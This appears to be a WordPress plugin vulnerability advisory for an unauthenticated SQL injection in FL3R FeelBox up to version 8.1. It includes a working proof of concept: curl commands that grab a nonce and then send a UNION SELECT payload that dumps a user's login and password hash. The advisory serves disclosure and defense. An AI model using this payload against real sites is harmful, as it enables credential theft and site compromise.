WordPress Plugin Vulnerabilities
FL3R FeelBox <= 8.1 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Proof of Concept
1. Visit a blog post and extract the nonce from the source (search for "feelboxAjax", and extract the "token") curl -s 'http://127.0.0.1:7777/?p=1' | grep 'token' 2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first user's username and password hash: curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_post' \ --data 'token=<NONCE HERE>&postID=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-20 (about 1 years ago)
Added
2023-01-20 (about 1 years ago)
Last Updated
2023-01-20 (about 1 years ago)